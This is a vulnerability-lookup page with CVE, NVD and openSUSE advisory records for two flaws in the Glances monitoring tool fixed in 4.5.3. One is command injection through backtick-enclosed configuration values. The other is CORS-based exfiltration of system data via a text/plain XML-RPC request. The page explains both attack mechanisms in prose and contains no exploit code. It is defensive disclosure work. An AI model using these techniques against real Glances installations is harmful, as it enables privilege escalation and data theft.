Vulnerability-Lookup

CVE-2026-33641 (GCVE-0-2026-33641)

Vulnerability from cvelistv5 – Published: 2026-04-02 14:57 – Updated: 2026-04-02 16:22

Title

Glances Vulnerable to Command Injection via Dynamic Configuration Values

Summary

Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3.

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/nicolargo/glances/security/adv…	x_refsource_CONFIRM
	https://github.com/nicolargo/glances/commit/358d7…	x_refsource_MISC
	https://github.com/nicolargo/glances/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	nicolargo	glances	Affected: < 4.5.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33641",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-02T16:09:58.862429Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-02T16:22:08.154Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "glances",
          "vendor": "nicolargo",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-02T14:57:51.120Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7"
        },
        {
          "name": "https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6"
        },
        {
          "name": "https://github.com/nicolargo/glances/releases/tag/v4.5.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.3"
        }
      ],
      "source": {
        "advisory": "GHSA-qhj7-v7h7-q4c7",
        "discovery": "UNKNOWN"
      },
      "title": "Glances Vulnerable to Command Injection via Dynamic Configuration Values"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33641",
    "datePublished": "2026-04-02T14:57:51.120Z",
    "dateReserved": "2026-03-23T14:24:11.620Z",
    "dateUpdated": "2026-04-02T16:22:08.154Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33641",
      "date": "2026-04-14",
      "epss": "0.00021",
      "percentile": "0.05482"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33641\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T15:16:40.040\",\"lastModified\":\"2026-04-07T14:59:46.823\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.5.3\",\"matchCriteriaId\":\"5D5895A8-B817-4EFE-BA8C-A8A9156139A7\"}]}]}],\"references\":[{\"url\":\"https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nicolargo/glances/releases/tag/v4.5.3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33641\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-02T16:09:58.862429Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-02T16:14:00.569Z\"}}], \"cna\": {\"title\": \"Glances Vulnerable to Command Injection via Dynamic Configuration Values\", \"source\": {\"advisory\": \"GHSA-qhj7-v7h7-q4c7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.3\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6\", \"name\": \"https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.3\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-02T14:57:51.120Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33641\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-02T16:22:08.154Z\", \"dateReserved\": \"2026-03-23T14:24:11.620Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-02T14:57:51.120Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33641

Vulnerability from fkie_nvd - Published: 2026-04-02 15:16 - Updated: 2026-04-07 14:59

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6	Patch
security-advisories@github.com	https://github.com/nicolargo/glances/releases/tag/v4.5.3	Product, Release Notes
security-advisories@github.com	https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	nicolargo	glances	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D5895A8-B817-4EFE-BA8C-A8A9156139A7",
              "versionEndExcluding": "4.5.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3."
    }
  ],
  "id": "CVE-2026-33641",
  "lastModified": "2026-04-07T14:59:46.823",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-02T15:16:40.040",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.3"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

OPENSUSE-SU-2026:10519-1

Vulnerability from csaf_opensuse - Published: 2026-04-09 00:00 - Updated: 2026-04-09 00:00

Summary

glances-common-4.5.3-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: glances-common-4.5.3-1.1 on GA media

Description of the patch: These are all security issues fixed in the glances-common-4.5.3-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10519

CVE-2026-33533

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

CVE-2026-33641

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Category

	https://www.suse.com/support/security/rating/	external
	https://ftp.suse.com/pub/projects/security/csaf/o…	self
	https://www.suse.com/security/cve/CVE-2026-33533/	self
	https://www.suse.com/security/cve/CVE-2026-33641/	self
	https://www.suse.com/security/cve/CVE-2026-33533	external
	https://bugzilla.suse.com/1261379	external
	https://www.suse.com/security/cve/CVE-2026-33641	external
	https://bugzilla.suse.com/1261380	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "glances-common-4.5.3-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the glances-common-4.5.3-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10519",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10519-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-33533 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-33533/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-33641 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-33641/"
      }
    ],
    "title": "glances-common-4.5.3-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-04-09T00:00:00Z",
      "generator": {
        "date": "2026-04-09T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10519-1",
      "initial_release_date": "2026-04-09T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-04-09T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.3-1.1.aarch64",
                "product": {
                  "name": "glances-common-4.5.3-1.1.aarch64",
                  "product_id": "glances-common-4.5.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.3-1.1.aarch64",
                "product": {
                  "name": "python311-Glances-4.5.3-1.1.aarch64",
                  "product_id": "python311-Glances-4.5.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.3-1.1.aarch64",
                "product": {
                  "name": "python313-Glances-4.5.3-1.1.aarch64",
                  "product_id": "python313-Glances-4.5.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.3-1.1.aarch64",
                "product": {
                  "name": "python314-Glances-4.5.3-1.1.aarch64",
                  "product_id": "python314-Glances-4.5.3-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.3-1.1.ppc64le",
                "product": {
                  "name": "glances-common-4.5.3-1.1.ppc64le",
                  "product_id": "glances-common-4.5.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.3-1.1.ppc64le",
                "product": {
                  "name": "python311-Glances-4.5.3-1.1.ppc64le",
                  "product_id": "python311-Glances-4.5.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.3-1.1.ppc64le",
                "product": {
                  "name": "python313-Glances-4.5.3-1.1.ppc64le",
                  "product_id": "python313-Glances-4.5.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.3-1.1.ppc64le",
                "product": {
                  "name": "python314-Glances-4.5.3-1.1.ppc64le",
                  "product_id": "python314-Glances-4.5.3-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.3-1.1.s390x",
                "product": {
                  "name": "glances-common-4.5.3-1.1.s390x",
                  "product_id": "glances-common-4.5.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.3-1.1.s390x",
                "product": {
                  "name": "python311-Glances-4.5.3-1.1.s390x",
                  "product_id": "python311-Glances-4.5.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.3-1.1.s390x",
                "product": {
                  "name": "python313-Glances-4.5.3-1.1.s390x",
                  "product_id": "python313-Glances-4.5.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.3-1.1.s390x",
                "product": {
                  "name": "python314-Glances-4.5.3-1.1.s390x",
                  "product_id": "python314-Glances-4.5.3-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.3-1.1.x86_64",
                "product": {
                  "name": "glances-common-4.5.3-1.1.x86_64",
                  "product_id": "glances-common-4.5.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.3-1.1.x86_64",
                "product": {
                  "name": "python311-Glances-4.5.3-1.1.x86_64",
                  "product_id": "python311-Glances-4.5.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.3-1.1.x86_64",
                "product": {
                  "name": "python313-Glances-4.5.3-1.1.x86_64",
                  "product_id": "python313-Glances-4.5.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.3-1.1.x86_64",
                "product": {
                  "name": "python314-Glances-4.5.3-1.1.x86_64",
                  "product_id": "python314-Glances-4.5.3-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.3-1.1.aarch64"
        },
        "product_reference": "glances-common-4.5.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.3-1.1.ppc64le"
        },
        "product_reference": "glances-common-4.5.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.3-1.1.s390x"
        },
        "product_reference": "glances-common-4.5.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.3-1.1.x86_64"
        },
        "product_reference": "glances-common-4.5.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.aarch64"
        },
        "product_reference": "python311-Glances-4.5.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.ppc64le"
        },
        "product_reference": "python311-Glances-4.5.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.s390x"
        },
        "product_reference": "python311-Glances-4.5.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.x86_64"
        },
        "product_reference": "python311-Glances-4.5.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.aarch64"
        },
        "product_reference": "python313-Glances-4.5.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.ppc64le"
        },
        "product_reference": "python313-Glances-4.5.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.s390x"
        },
        "product_reference": "python313-Glances-4.5.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.x86_64"
        },
        "product_reference": "python313-Glances-4.5.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.aarch64"
        },
        "product_reference": "python314-Glances-4.5.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.ppc64le"
        },
        "product_reference": "python314-Glances-4.5.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.s390x"
        },
        "product_reference": "python314-Glances-4.5.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.x86_64"
        },
        "product_reference": "python314-Glances-4.5.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-33533",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-33533"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, the Glances XML-RPC server (activated with glances -s or glances --server) sends Access-Control-Allow-Origin: * on every HTTP response. Because the XML-RPC handler does not validate the Content-Type header, an attacker-controlled webpage can issue a CORS \"simple request\" (POST with Content-Type: text/plain) containing a valid XML-RPC payload. The browser sends the request without a preflight check, the server processes the XML body and returns the full system monitoring dataset, and the wildcard CORS header lets the attacker\u0027s JavaScript read the response. The result is complete exfiltration of hostname, OS version, IP addresses, CPU/memory/disk/network stats, and the full process list including command lines (which often contain tokens, passwords, or internal paths). This issue has been patched in version 4.5.3.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.ppc64le",
